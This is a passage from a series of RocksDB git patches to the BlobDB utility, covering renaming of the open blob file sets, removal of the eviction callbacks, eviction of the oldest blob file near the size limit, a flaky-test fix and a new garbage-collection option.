nullptr; + if (open_ttl_files_.empty()) return nullptr; std::shared_ptr tmp = std::make_shared(); tmp->expiration_range_ = std::make_pair(expiration, 0); - auto citr = open_blob_files_.equal_range(tmp); - if (citr.first == open_blob_files_.end()) { - assert(citr.second == open_blob_files_.end()); + auto citr = open_ttl_files_.equal_range(tmp); + if (citr.first == open_ttl_files_.end()) { + assert(citr.second == open_ttl_files_.end()); - std::shared_ptr check = *(open_blob_files_.rbegin()); + std::shared_ptr check = *(open_ttl_files_.rbegin()); return (check->expiration_range_.second < expiration) ? nullptr : check; } if (citr.first != citr.second) return *(citr.first); auto finditr = citr.second; - if (finditr != open_blob_files_.begin()) --finditr; + if (finditr != open_ttl_files_.begin()) --finditr; bool b2 = (*finditr)->expiration_range_.second < expiration; bool b1 = (*finditr)->expiration_range_.first > expiration; @@ -530,11 +530,17 @@ std::shared_ptr BlobDBImpl::CheckOrCreateWriterLocked( } std::shared_ptr BlobDBImpl::SelectBlobFile() { - uint32_t val = blob_rgen.Next(); { ReadLock rl(&mutex_); - if (open_simple_files_.size() == bdb_options_.num_concurrent_simple_blobs) - return open_simple_files_[val % bdb_options_.num_concurrent_simple_blobs]; + if (open_non_ttl_file_ != nullptr) { + return open_non_ttl_file_; + } + } + + // CHECK again + WriteLock wl(&mutex_); + if (open_non_ttl_file_ != nullptr) { + return open_non_ttl_file_; } std::shared_ptr bfile = NewBlobFile("SelectBlobFile"); @@ -557,12 +563,6 @@ std::shared_ptr BlobDBImpl::SelectBlobFile() { bfile->header_valid_ = true; bfile->SetHasTTL(false); - // CHECK again - WriteLock wl(&mutex_); - if (open_simple_files_.size() == bdb_options_.num_concurrent_simple_blobs) { - return open_simple_files_[val % bdb_options_.num_concurrent_simple_blobs]; - } - Status s = writer->WriteHeader(bfile->header_); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, @@ -574,7 +574,7 @@ std::shared_ptr BlobDBImpl::SelectBlobFile() { dir_change_.store(true); blob_files_.insert(std::make_pair(bfile->BlobFileNumber(), bfile)); - open_simple_files_.push_back(bfile); + open_non_ttl_file_ = bfile; return bfile; } @@ -625,7 +625,7 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { bfile->file_size_ = BlobLogHeader::kSize; // set the first value of the range, since that is - // concrete at this time. also necessary to add to open_blob_files_ + // concrete at this time. also necessary to add to open_ttl_files_ bfile->expiration_range_ = expiration_range; WriteLock wl(&mutex_); @@ -647,7 +647,7 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { dir_change_.store(true); blob_files_.insert(std::make_pair(bfile->BlobFileNumber(), bfile)); - open_blob_files_.insert(bfile); + open_ttl_files_.insert(bfile); epoch_of_++; return bfile; @@ -1192,9 +1192,9 @@ std::pair BlobDBImpl::SanityCheck(bool aborted) { blob_files_.size()); ROCKS_LOG_INFO(db_options_.info_log, "Number of open files %" PRIu64, - open_blob_files_.size()); + open_ttl_files_.size()); - for (auto bfile : open_blob_files_) { + for (auto bfile : open_ttl_files_) { assert(!bfile->Immutable()); } @@ -1215,6 +1215,7 @@ std::pair BlobDBImpl::SanityCheck(bool aborted) { } Status BlobDBImpl::CloseBlobFile(std::shared_ptr bfile) { + assert(bfile != nullptr); Status s; ROCKS_LOG_INFO(db_options_.info_log, "Close blob file %" PRIu64, bfile->BlobFileNumber()); @@ -1222,13 +1223,12 @@ Status BlobDBImpl::CloseBlobFile(std::shared_ptr bfile) { WriteLock wl(&mutex_); if (bfile->HasTTL()) { - size_t erased __attribute__((__unused__)) = open_blob_files_.erase(bfile); + size_t erased __attribute__((__unused__)); + erased = open_ttl_files_.erase(bfile); assert(erased == 1); } else { - auto iter = std::find(open_simple_files_.begin(), - open_simple_files_.end(), bfile); - assert(iter != open_simple_files_.end()); - open_simple_files_.erase(iter); + assert(bfile == open_non_ttl_file_); + open_non_ttl_file_ = nullptr; } } @@ -1411,7 +1411,7 @@ std::pair BlobDBImpl::CheckSeqFiles(bool aborted) { uint64_t epoch_now = EpochNow(); ReadLock rl(&mutex_); - for (auto bfile : open_blob_files_) { + for (auto bfile : open_ttl_files_) { { ReadLock lockbfile_r(&bfile->mutex_); @@ -1436,14 +1436,14 @@ std::pair BlobDBImpl::FsyncFiles(bool aborted) { std::vector> process_files; { ReadLock rl(&mutex_); - for (auto fitr : open_blob_files_) { + for (auto fitr : open_ttl_files_) { if (fitr->NeedsFsync(true, bdb_options_.bytes_per_sync)) process_files.push_back(fitr); } - for (auto fitr : open_simple_files_) { - if (fitr->NeedsFsync(true, bdb_options_.bytes_per_sync)) - process_files.push_back(fitr); + if (open_non_ttl_file_ != nullptr && + open_non_ttl_file_->NeedsFsync(true, bdb_options_.bytes_per_sync)) { + process_files.push_back(open_non_ttl_file_); } } @@ -1799,7 +1799,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, // but under the asusmption that this is only called when a // file is Immutable, we can reduce the critical section bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, - bool is_oldest_simple_blob_file, + bool is_oldest_non_ttl_file, std::string* reason) { if (bfile->HasTTL()) { ExpirationRange expiration_range = bfile->GetExpirationRange(); @@ -1857,7 +1857,7 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, return false; } - if (is_oldest_simple_blob_file) { + if (is_oldest_non_ttl_file) { *reason = "out of space and is the oldest simple blob file"; return true; } @@ -1923,72 +1923,6 @@ std::pair BlobDBImpl::DeleteObsoleteFiles(bool aborted) { return std::make_pair(!aborted, -1); } -bool BlobDBImpl::CallbackEvictsImpl(std::shared_ptr bfile) { - std::shared_ptr reader = - bfile->OpenSequentialReader(env_, db_options_, env_options_); - if (!reader) { - ROCKS_LOG_ERROR( - db_options_.info_log, - "File sequential reader could not be opened for evict callback: %s", - bfile->PathName().c_str()); - return false; - } - - ReadLock lockbfile_r(&bfile->mutex_); - - BlobLogHeader header; - Status s = reader->ReadHeader(&header); - if (!s.ok()) { - ROCKS_LOG_ERROR( - db_options_.info_log, - "Failure to read header for blob-file during evict callback %s", - bfile->PathName().c_str()); - return false; - } - - ColumnFamilyHandle* cfh = - db_impl_->GetColumnFamilyHandleUnlocked(bfile->column_family_id()); - BlobLogRecord record; - Reader::ReadLevel full = Reader::kReadHeaderKeyBlob; - while (reader->ReadRecord(&record, full).ok()) { - bdb_options_.gc_evict_cb_fn(cfh, record.key, record.value); - } - - return true; -} - -std::pair BlobDBImpl::RemoveTimerQ(TimerQueue* tq, - bool aborted) { - WriteLock wl(&mutex_); - for (auto itr = cb_threads_.begin(); itr != cb_threads_.end(); ++itr) { - if ((*itr).get() != tq) continue; - - cb_threads_.erase(itr); - break; - } - return std::make_pair(false, -1); -} - -std::pair BlobDBImpl::CallbackEvicts( - TimerQueue* tq, std::shared_ptr bfile, bool aborted) { - if (aborted) return std::make_pair(false, -1); - bool succ = CallbackEvictsImpl(bfile); - if (succ) { - ROCKS_LOG_DEBUG(db_options_.info_log, "Eviction callbacks completed %s", - bfile->PathName().c_str()); - } - - WriteLock wl(&mutex_); - bfile->SetCanBeDeleted(); - obsolete_files_.push_front(bfile); - if (tq) { - // all of the callbacks have been processed - tqueue_.add(0, std::bind(&BlobDBImpl::RemoveTimerQ, this, tq, - std::placeholders::_1)); - } - return std::make_pair(false, -1); -} - void BlobDBImpl::CopyBlobFiles( std::vector>* bfiles_copy) { ReadLock rl(&mutex_); @@ -2010,7 +1944,7 @@ void BlobDBImpl::FilterSubsetOfFiles( uint64_t now = EpochNow(); size_t files_processed = 0; - bool simple_blob_file_found = false; + bool non_ttl_file_found = false; for (auto bfile : blob_files) { if (files_processed >= files_to_collect) break; // if this is the first time processing the file @@ -2030,15 +1964,14 @@ void BlobDBImpl::FilterSubsetOfFiles( // then it should not be GC'd if (bfile->Obsolete() || !bfile->Immutable()) continue; - bool is_oldest_simple_blob_file = false; - if (!simple_blob_file_found && !bfile->HasTTL()) { - is_oldest_simple_blob_file = true; - simple_blob_file_found = true; + bool is_oldest_non_ttl_file = false; + if (!non_ttl_file_found && !bfile->HasTTL()) { + is_oldest_non_ttl_file = true; + non_ttl_file_found = true; } std::string reason; - bool shouldgc = - ShouldGCFile(bfile, now, is_oldest_simple_blob_file, &reason); + bool shouldgc = ShouldGCFile(bfile, now, is_oldest_non_ttl_file, &reason); if (!shouldgc) { ROCKS_LOG_DEBUG(db_options_.info_log, "File has been skipped for GC ttl %s %" PRIu64 " %" PRIu64 @@ -2096,25 +2029,11 @@ std::pair BlobDBImpl::RunGC(bool aborted) { } if (!obsoletes.empty()) { - bool evict_cb = (!!bdb_options_.gc_evict_cb_fn); - std::shared_ptr tq; - if (evict_cb) tq = std::make_shared(); - - // if evict callback is present, first schedule the callback thread WriteLock wl(&mutex_); for (auto bfile : obsoletes) { - bool last_file = (bfile == obsoletes.back()); - - if (!evict_cb) { - bfile->SetCanBeDeleted(); - obsolete_files_.push_front(bfile); - } else { - tq->add(0, std::bind(&BlobDBImpl::CallbackEvicts, this, - (last_file) ? tq.get() : nullptr, bfile, - std::placeholders::_1)); - } + bfile->SetCanBeDeleted(); + obsolete_files_.push_front(bfile); } - if (evict_cb) cb_threads_.emplace_back(tq); } // reschedule diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index b18d26e1f4e..f9036300810 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -305,7 +305,7 @@ class BlobDBImpl : public BlobDB { // tt - current time // last_id - the id of the non-TTL file to evict bool ShouldGCFile(std::shared_ptr bfile, uint64_t now, - bool is_oldest_simple_blob_file, std::string* reason); + bool is_oldest_non_ttl_file, std::string* reason); // collect all the blob log files from the blob directory Status GetAllLogFiles(std::set>* file_nums); @@ -370,14 +370,8 @@ class BlobDBImpl : public BlobDB { std::pair EvictCompacted(bool aborted); - bool CallbackEvictsImpl(std::shared_ptr bfile); - std::pair RemoveTimerQ(TimerQueue* tq, bool aborted); - std::pair CallbackEvicts(TimerQueue* tq, - std::shared_ptr bfile, - bool aborted); - // Adds the background tasks to the timer queue void StartBackgroundTasks(); @@ -467,12 +461,12 @@ class BlobDBImpl : public BlobDB { // epoch or version of the open files. std::atomic epoch_of_; - // All opened non-TTL blob files. - std::vector> open_simple_files_; + // opened non-TTL blob file. + std::shared_ptr open_non_ttl_file_; // all the blob files which are currently being appended to based // on variety of incoming TTL's - std::multiset, blobf_compare_ttl> open_blob_files_; + std::multiset, blobf_compare_ttl> open_ttl_files_; // packet of information to put in lockess delete(s) queue struct delete_packet_t { @@ -505,9 +499,6 @@ class BlobDBImpl : public BlobDB { // timer based queue to execute tasks TimerQueue tqueue_; - // timer queues to call eviction callbacks. - std::vector> cb_threads_; - // only accessed in GC thread, hence not atomic. The epoch of the // GC task. Each execution is one epoch. Helps us in allocating // files to one execution diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 85507eb5f00..4dcf1a752bd 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -268,7 +268,6 @@ TEST_F(BlobDBTest, TTLExtrator_NoTTL) { bdb_options.ttl_range_secs = 1000; bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; - bdb_options.num_concurrent_simple_blobs = 1; bdb_options.ttl_extractor = ttl_extractor_; bdb_options.disable_background_tasks = true; Open(bdb_options, options); From f98efcb1e346052cd820bd21f73bd362a185fea1 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Thu, 2 Nov 2017 12:02:42 -0700 Subject: [PATCH 182/205] Blob DB: Evict oldest blob file when close to blob db size limit Summary: Evict oldest blob file and put it in obsolete_files list when close to blob db size limit. The file will be delete when the `DeleteObsoleteFiles` background job runs next time. For now I set `kEvictOldestFileAtSize` constant, which controls when to evict the oldest file, at 90%. It could be tweaked or made into an option if really needed; I didn't want to expose it as an option pre-maturely as there are already too many :) . Closes https://github.com/facebook/rocksdb/pull/3094 Differential Revision: D6187340 Pulled By: sagar0 fbshipit-source-id: 687f8262101b9301bf964b94025a2fe9d8573421 --- utilities/blob_db/blob_db_impl.cc | 78 +++++++++++++++++++++++++------ utilities/blob_db/blob_db_impl.h | 16 ++++++- utilities/blob_db/blob_db_test.cc | 44 +++++++++++++++-- 3 files changed, 119 insertions(+), 19 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 7c27be789d0..db01aadf74f 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -62,7 +62,7 @@ bool blobf_compare_ttl::operator()(const std::shared_ptr& lhs, if (lhs->expiration_range_.first > rhs->expiration_range_.first) { return false; } - return lhs->BlobFileNumber() > rhs->BlobFileNumber(); + return lhs->BlobFileNumber() < rhs->BlobFileNumber(); } void EvictAllVersionsCompactionListener::InternalListener::OnCompaction( @@ -117,7 +117,8 @@ BlobDBImpl::BlobDBImpl(const std::string& dbname, total_periods_ampl_(0), total_blob_space_(0), open_p1_done_(false), - debug_level_(0) { + debug_level_(0), + oldest_file_evicted_(false) { blob_dir_ = (bdb_options_.path_relative) ? dbname + "/" + bdb_options_.blob_dir : bdb_options_.blob_dir; @@ -171,7 +172,8 @@ BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) last_period_ampl_(0), total_periods_write_(0), total_periods_ampl_(0), - total_blob_space_(0) { + total_blob_space_(0), + oldest_file_evicted_(false) { if (!bdb_options_.blob_dir.empty()) blob_dir_ = (bdb_options_.path_relative) ? db_->GetName() + "/" + bdb_options_.blob_dir @@ -931,20 +933,56 @@ uint64_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, return has_expiration ? expiration : kNoExpiration; } +std::shared_ptr BlobDBImpl::GetOldestBlobFile() { + std::vector> blob_files; + CopyBlobFiles(&blob_files, [](const std::shared_ptr& f) { + return !f->Obsolete() && f->Immutable(); + }); + blobf_compare_ttl compare; + return *std::min_element(blob_files.begin(), blob_files.end(), compare); +} + +bool BlobDBImpl::EvictOldestBlobFile() { + auto oldest_file = GetOldestBlobFile(); + if (oldest_file == nullptr) { + return false; + } + + WriteLock wl(&mutex_); + oldest_file->SetCanBeDeleted(); + obsolete_files_.push_front(oldest_file); + oldest_file_evicted_.store(true); + return true; +} + +Status BlobDBImpl::CheckSize(size_t blob_size) { + uint64_t new_space_util = total_blob_space_.load() + blob_size; + if (bdb_options_.blob_dir_size > 0) { + if (!bdb_options_.is_fifo && + (new_space_util > bdb_options_.blob_dir_size)) { + return Status::NoSpace( + "Write failed, as writing it would exceed blob_dir_size limit."); + } + if (bdb_options_.is_fifo && !oldest_file_evicted_.load() && + (new_space_util > + kEvictOldestFileAtSize * bdb_options_.blob_dir_size)) { + EvictOldestBlobFile(); + } + } + + return Status::OK(); +} + Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, const Slice& value, uint64_t expiration, std::string* index_entry) { auto size_put = BlobLogRecord::kHeaderSize + key.size() + value.size(); - if (bdb_options_.blob_dir_size > 0 && - (total_blob_space_.load() + size_put) > bdb_options_.blob_dir_size) { - if (!bdb_options_.is_fifo) { - return Status::NoSpace("Blob DB reached the maximum configured size."); - } + Status s = CheckSize(size_put); + if (!s.ok()) { + return s; } - Status s; - uint64_t blob_offset = 0; uint64_t key_offset = 0; { @@ -1910,7 +1948,12 @@ std::pair BlobDBImpl::DeleteObsoleteFiles(bool aborted) { } // directory change. Fsync - if (file_deleted) dir_ent_->Fsync(); + if (file_deleted) { + dir_ent_->Fsync(); + + // reset oldest_file_evicted flag + oldest_file_evicted_.store(false); + } // put files back into obsolete if for some reason, delete failed if (!tobsolete.empty()) { @@ -1924,13 +1967,18 @@ std::pair BlobDBImpl::DeleteObsoleteFiles(bool aborted) { } void BlobDBImpl::CopyBlobFiles( - std::vector>* bfiles_copy) { + std::vector>* bfiles_copy, + std::function&)> predicate) { ReadLock rl(&mutex_); - // take a copy - bfiles_copy->reserve(blob_files_.size()); for (auto const& p : blob_files_) { - bfiles_copy->push_back(p.second); + bool pred_value = true; + if (predicate) { + pred_value = predicate(p.second); + } + if (pred_value) { + bfiles_copy->push_back(p.second); + } } } diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index f9036300810..fc36712bed6 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -205,6 +205,10 @@ class BlobDBImpl : public BlobDB { // how often to schedule check seq files period static constexpr uint32_t kCheckSeqFilesPeriodMillisecs = 10 * 1000; + // when should oldest file be evicted: + // on reaching 90% of blob_dir_size + static constexpr double kEvictOldestFileAtSize = 0.9; + using BlobDB::Put; Status Put(const WriteOptions& options, const Slice& key, const Slice& value) override; @@ -414,7 +418,9 @@ class BlobDBImpl : public BlobDB { bool FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, uint64_t blob_offset, uint64_t blob_size); - void CopyBlobFiles(std::vector>* bfiles_copy); + void CopyBlobFiles( + std::vector>* bfiles_copy, + std::function&)> predicate = {}); void FilterSubsetOfFiles( const std::vector>& blob_files, @@ -423,6 +429,12 @@ class BlobDBImpl : public BlobDB { uint64_t EpochNow() { return env_->NowMicros() / 1000000; } + Status CheckSize(size_t blob_size); + + std::shared_ptr GetOldestBlobFile(); + + bool EvictOldestBlobFile(); + // the base DB DBImpl* db_impl_; Env* env_; @@ -526,6 +538,8 @@ class BlobDBImpl : public BlobDB { bool open_p1_done_; uint32_t debug_level_; + + std::atomic oldest_file_evicted_; }; } // namespace blob_db diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 4dcf1a752bd..0eb4d791b84 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -700,12 +700,15 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { VerifyDB({{"foo", "v2"}}); } -TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { +// This test is no longer valid since we now return an error when we go +// over the configured blob_dir_size. +// The test needs to be re-written later in such a way that writes continue +// after a GC happens. +TEST_F(BlobDBTest, DISABLED_GCOldestSimpleBlobFileWhenOutOfSpace) { // Use mock env to stop wall clock. Options options; options.env = mock_env_.get(); BlobDBOptions bdb_options; - bdb_options.is_fifo = true; bdb_options.blob_dir_size = 100; bdb_options.blob_file_size = 100; bdb_options.min_blob_size = 0; @@ -927,7 +930,7 @@ TEST_F(BlobDBTest, MigrateFromPlainRocksDB) { } // Test to verify that a NoSpace IOError Status is returned on reaching -// blob_dir_size limit. +// blob_dir_size limit. TEST_F(BlobDBTest, OutOfSpace) { // Use mock env to stop wall clock. Options options; @@ -949,6 +952,41 @@ TEST_F(BlobDBTest, OutOfSpace) { ASSERT_TRUE(s.IsNoSpace()); } +TEST_F(BlobDBTest, EvictOldestFileWhenCloseToSpaceLimit) { + // Use mock env to stop wall clock. + Options options; + BlobDBOptions bdb_options; + bdb_options.blob_dir_size = 270; + bdb_options.blob_file_size = 100; + bdb_options.disable_background_tasks = true; + bdb_options.is_fifo = true; + Open(bdb_options); + + // Each stored blob has an overhead of about 32 bytes currently. + // So a 100 byte blob should take up 132 bytes. + std::string value(100, 'v'); + ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key1", value, 10)); + + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + + // Adding another 100 byte blob would take the total size to 264 bytes + // (2*132), which is more than 90% of blob_dir_size. So, the oldest file + // should be evicted and put in obsolete files list. + ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key2", value, 60)); + + auto obsolete_files = bdb_impl->TEST_GetObsoleteFiles(); + ASSERT_EQ(1, obsolete_files.size()); + ASSERT_TRUE(obsolete_files[0]->Immutable()); + ASSERT_EQ(blob_files[0]->BlobFileNumber(), + obsolete_files[0]->BlobFileNumber()); + + bdb_impl->TEST_DeleteObsoleteFiles(); + obsolete_files = bdb_impl->TEST_GetObsoleteFiles(); + ASSERT_TRUE(obsolete_files.empty()); +} + TEST_F(BlobDBTest, InlineSmallValues) { constexpr uint64_t kMaxExpiration = 1000; Random rnd(301); From 11bacd578765dad2f92b361cc73df0e635301723 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 2 Nov 2017 13:20:28 -0700 Subject: [PATCH 183/205] Blob DB: Fix flaky BlobDBTest::GCExpiredKeyWhileOverwriting test Summary: The test intent to wait until key being overwritten until proceed with garbage collection. It failed to wait for `PutUntil` finally finish. Fixing it. Closes https://github.com/facebook/rocksdb/pull/3116 Differential Revision: D6222833 Pulled By: yiwu-arbug fbshipit-source-id: fa9b57a772b92a66cf250b44e7975c43f62f45c5 --- utilities/blob_db/blob_db_impl.cc | 4 ++-- utilities/blob_db/blob_db_test.cc | 8 ++++---- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index db01aadf74f..79e2203e01a 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -838,6 +838,7 @@ Status BlobDBImpl::PutWithTTL(const WriteOptions& options, Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t expiration) { + TEST_SYNC_POINT("BlobDBImpl::PutUntil:Start"); MutexLock l(&write_mutex_); SequenceNumber sequence = GetLatestSequenceNumber() + 1; WriteBatch batch; @@ -845,13 +846,13 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, if (s.ok()) { s = db_->Write(options, &batch); } + TEST_SYNC_POINT("BlobDBImpl::PutUntil:Finish"); return s; } Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t expiration, SequenceNumber sequence, WriteBatch* batch) { - TEST_SYNC_POINT("BlobDBImpl::PutBlobValue:Start"); Status s; std::string index_entry; uint32_t column_family_id = @@ -903,7 +904,6 @@ Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key, } } - TEST_SYNC_POINT("BlobDBImpl::PutBlobValue:Finish"); return s; } diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 0eb4d791b84..9ffdb234f7c 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -642,8 +642,8 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", - "BlobDBImpl::PutBlobValue:Start"}, - {"BlobDBImpl::PutBlobValue:Finish", + "BlobDBImpl::PutUntil:Start"}, + {"BlobDBImpl::PutUntil:Finish", "BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"}}); SyncPoint::GetInstance()->EnableProcessing(); @@ -680,8 +680,8 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", - "BlobDBImpl::PutBlobValue:Start"}, - {"BlobDBImpl::PutBlobValue:Finish", + "BlobDBImpl::PutUntil:Start"}, + {"BlobDBImpl::PutUntil:Finish", "BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"}}); SyncPoint::GetInstance()->EnableProcessing(); From 632f36dcd3360bf3d287af65bc98bd2db2d2b79a Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 2 Nov 2017 15:47:30 -0700 Subject: [PATCH 184/205] Blob DB: option to enable garbage collection Summary: Add an option to enable/disable auto garbage collection, where we keep counting how many keys have been evicted by either deletion or compaction and decide whether to garbage collect a blob file. Default disable auto garbage collection for now since the whole logic is not fully tested and we plan to make major change to it. Closes https://github.com/facebook/rocksdb/pull/3117 Differential Revision: D6224756 Pulled By: yiwu-arbug fbshipit-source-id: cdf53bdccec96a4580a2b3a342110ad9e8864dfe --- utilities/blob_db/blob_db.cc | 46 ++++++++++++++++++++----------- utilities/blob_db/blob_db.h | 7 ++++- utilities/blob_db/blob_db_impl.cc | 45 +++++++++++++++++++----------- 3 files changed, 65 insertions(+), 33 deletions(-) diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc index 1fd9261417b..f763ced20cf 100644 --- a/utilities/blob_db/blob_db.cc +++ b/utilities/blob_db/blob_db.cc @@ -57,12 +57,16 @@ Status BlobDB::OpenAndLoad(const Options& options, { MutexLock l(&listener_mutex); all_blobdb_listeners.push_back(fblistener); - all_blobdb_listeners.push_back(ce_listener); + if (bdb_options.enable_garbage_collection) { + all_blobdb_listeners.push_back(ce_listener); + } all_wal_filters.push_back(rw_filter); } changed_options->listeners.emplace_back(fblistener); - changed_options->listeners.emplace_back(ce_listener); + if (bdb_options.enable_garbage_collection) { + changed_options->listeners.emplace_back(ce_listener); + } changed_options->wal_filter = rw_filter.get(); DBOptions db_options(*changed_options); @@ -71,7 +75,9 @@ Status BlobDB::OpenAndLoad(const Options& options, BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, db_options); fblistener->SetImplPtr(bdb); - ce_listener->SetImplPtr(bdb); + if (bdb_options.enable_garbage_collection) { + ce_listener->SetImplPtr(bdb); + } rw_filter->SetImplPtr(bdb); Status s = bdb->OpenPhase1(); @@ -124,20 +130,26 @@ Status BlobDB::Open(const DBOptions& db_options_input, ReconcileWalFilter_t rw_filter = std::make_shared(); db_options.listeners.emplace_back(fblistener); - db_options.listeners.emplace_back(ce_listener); + if (bdb_options.enable_garbage_collection) { + db_options.listeners.emplace_back(ce_listener); + } db_options.wal_filter = rw_filter.get(); { MutexLock l(&listener_mutex); all_blobdb_listeners.push_back(fblistener); - all_blobdb_listeners.push_back(ce_listener); + if (bdb_options.enable_garbage_collection) { + all_blobdb_listeners.push_back(ce_listener); + } all_wal_filters.push_back(rw_filter); } // we need to open blob db first so that recovery can happen BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, db_options); fblistener->SetImplPtr(bdb); - ce_listener->SetImplPtr(bdb); + if (bdb_options.enable_garbage_collection) { + ce_listener->SetImplPtr(bdb); + } rw_filter->SetImplPtr(bdb); s = bdb->OpenPhase1(); @@ -172,25 +184,27 @@ Status BlobDB::Open(const DBOptions& db_options_input, BlobDB::BlobDB(DB* db) : StackableDB(db) {} void BlobDBOptions::Dump(Logger* log) const { - ROCKS_LOG_HEADER(log, " blob_db_options.blob_dir: %s", + ROCKS_LOG_HEADER(log, " blob_db_options.blob_dir: %s", blob_dir.c_str()); - ROCKS_LOG_HEADER(log, " blob_db_options.path_relative: %d", + ROCKS_LOG_HEADER(log, " blob_db_options.path_relative: %d", path_relative); - ROCKS_LOG_HEADER(log, " blob_db_options.is_fifo: %d", + ROCKS_LOG_HEADER(log, " blob_db_options.is_fifo: %d", is_fifo); - ROCKS_LOG_HEADER(log, " blob_db_options.blob_dir_size: %" PRIu64, + ROCKS_LOG_HEADER(log, " blob_db_options.blob_dir_size: %" PRIu64, blob_dir_size); - ROCKS_LOG_HEADER(log, " blob_db_options.ttl_range_secs: %" PRIu32, + ROCKS_LOG_HEADER(log, " blob_db_options.ttl_range_secs: %" PRIu32, ttl_range_secs); - ROCKS_LOG_HEADER(log, " blob_db_options.bytes_per_sync: %" PRIu64, + ROCKS_LOG_HEADER(log, " blob_db_options.bytes_per_sync: %" PRIu64, bytes_per_sync); - ROCKS_LOG_HEADER(log, " blob_db_options.blob_file_size: %" PRIu64, + ROCKS_LOG_HEADER(log, " blob_db_options.blob_file_size: %" PRIu64, blob_file_size); - ROCKS_LOG_HEADER(log, " blob_db_options.ttl_extractor: %p", + ROCKS_LOG_HEADER(log, " blob_db_options.ttl_extractor: %p", ttl_extractor.get()); - ROCKS_LOG_HEADER(log, " blob_db_options.compression: %d", + ROCKS_LOG_HEADER(log, " blob_db_options.compression: %d", static_cast(compression)); - ROCKS_LOG_HEADER(log, " blob_db_options.disable_background_tasks: %d", + ROCKS_LOG_HEADER(log, "blob_db_options.enable_garbage_collection: %d", + enable_garbage_collection); + ROCKS_LOG_HEADER(log, " blob_db_options.disable_background_tasks: %d", disable_background_tasks); } diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index 1ef382ab867..3ade460eb2f 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -71,7 +71,12 @@ struct BlobDBOptions { // what compression to use for Blob's CompressionType compression = kNoCompression; - // Disable all background job. + // If enabled, blob DB periodically cleanup stale data by rewriting remaining + // live data in blob files to new files. If garbage collection is not enabled, + // blob files will be cleanup based on TTL. + bool enable_garbage_collection = false; + + // Disable all background job. Used for test only. bool disable_background_tasks = false; void Dump(Logger* log) const; diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 79e2203e01a..3a6a84babef 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -69,6 +69,7 @@ void EvictAllVersionsCompactionListener::InternalListener::OnCompaction( int level, const Slice& key, CompactionEventListener::CompactionListenerValueType value_type, const Slice& existing_value, const SequenceNumber& sn, bool is_new) { + assert(impl_->bdb_options_.enable_garbage_collection); if (!is_new && value_type == CompactionEventListener::CompactionListenerValueType::kValue) { @@ -213,12 +214,14 @@ void BlobDBImpl::StartBackgroundTasks() { std::bind(&BlobDBImpl::ReclaimOpenFiles, this, std::placeholders::_1)); tqueue_.add(kGCCheckPeriodMillisecs, 